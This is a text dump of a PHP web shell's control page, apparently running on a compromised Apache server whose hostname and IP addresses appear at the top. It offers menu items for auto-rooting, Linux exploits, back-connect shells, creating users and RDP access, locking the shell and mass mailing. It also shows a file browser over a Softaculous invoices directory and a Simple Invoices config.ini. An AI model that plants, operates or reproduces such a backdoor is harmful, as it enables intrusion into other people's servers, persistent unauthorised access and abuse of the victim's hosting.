Linux server2.hpierson.com 3.10.0-1160.105.1.el7.x86_64 #1 SMP Thu Dec 7 15:39:45 UTC 2023 x86_64
Apache
: 162.0.216.123 | : 216.73.216.152
28 Domain
?7.4.33
yvffpqmy
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
softaculous /
invoices /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
images
[ DIR ]
drwxr-xr-x
?;
php53
[ DIR ]
drwxr-xr-x
?;
php56
[ DIR ]
drwxr-xr-x
?;
php71
[ DIR ]
drwxr-xr-x
clone.php
2.83
KB
-rw-r--r--
config.ini
1.95
KB
-rw-r--r--
edit.php
4.85
KB
-rw-r--r--
edit.xml
489
B
-rw-r--r--
fileindex.php
153
B
-rw-r--r--
import.php
3.39
KB
-rw-r--r--
info.xml
1.27
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.19
KB
-rw-r--r--
install.xml
1.6
KB
-rw-r--r--
md5
2.45
KB
-rw-r--r--
notes.txt
190
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.ini
; Simple Invoices configuration file ; - refer http://www.simpleinvoices.org/config for all options ; Production site configuration data [production] database.adapter = pdo_mysql database.utf8 = true database.params.host = [[softdbhost]] database.params.username = [[softdbuser]] database.params.password = [[softdbpass]] database.params.dbname = [[softdb]] database.params.port = 3306 authentication.enabled = true authentication.http = export.spreadsheet = xls export.wordprocessor = doc export.pdf.screensize = 800 export.pdf.papersize = A4 export.pdf.leftmargin = 15 export.pdf.rightmargin = 15 export.pdf.topmargin = 15 export.pdf.bottommargin = 15 local.locale = [[language]] local.precision = 2 email.host = localhost email.smtp_auth = false email.username = email.password = email.smtpport = 25 email.secure = email.ack = false encryption.default.key = [[encryption_key]] nonce.key = [[nonce_key]] nonce.timelimit = 3600 version.name = 2011.1 - stable debug.level = All debug.error_reporting = E_ERROR phpSettings.date.timezone = Europe/London phpSettings.display_startup_errors = 1 phpSettings.display_errors = 1 phpSettings.log_errors = 0 phpSettings.error_log = tmp/log/php.log ; Explicity confirm delete of line items from invoices? (yes/no) confirm.deleteLineItem = no ; Staging site configuration data inherits from production and ; overrides values as necessary [staging : production] database.params.dbname = [[softdb]] database.params.username = [[softdbuser]] database.params.password = [[softdbpass]] [dev : production] database.params.dbname = [[softdb]] debug.error_reporting = E_ALL phpSettings.display_startup_errors = 1 phpSettings.display_errors = 1
Close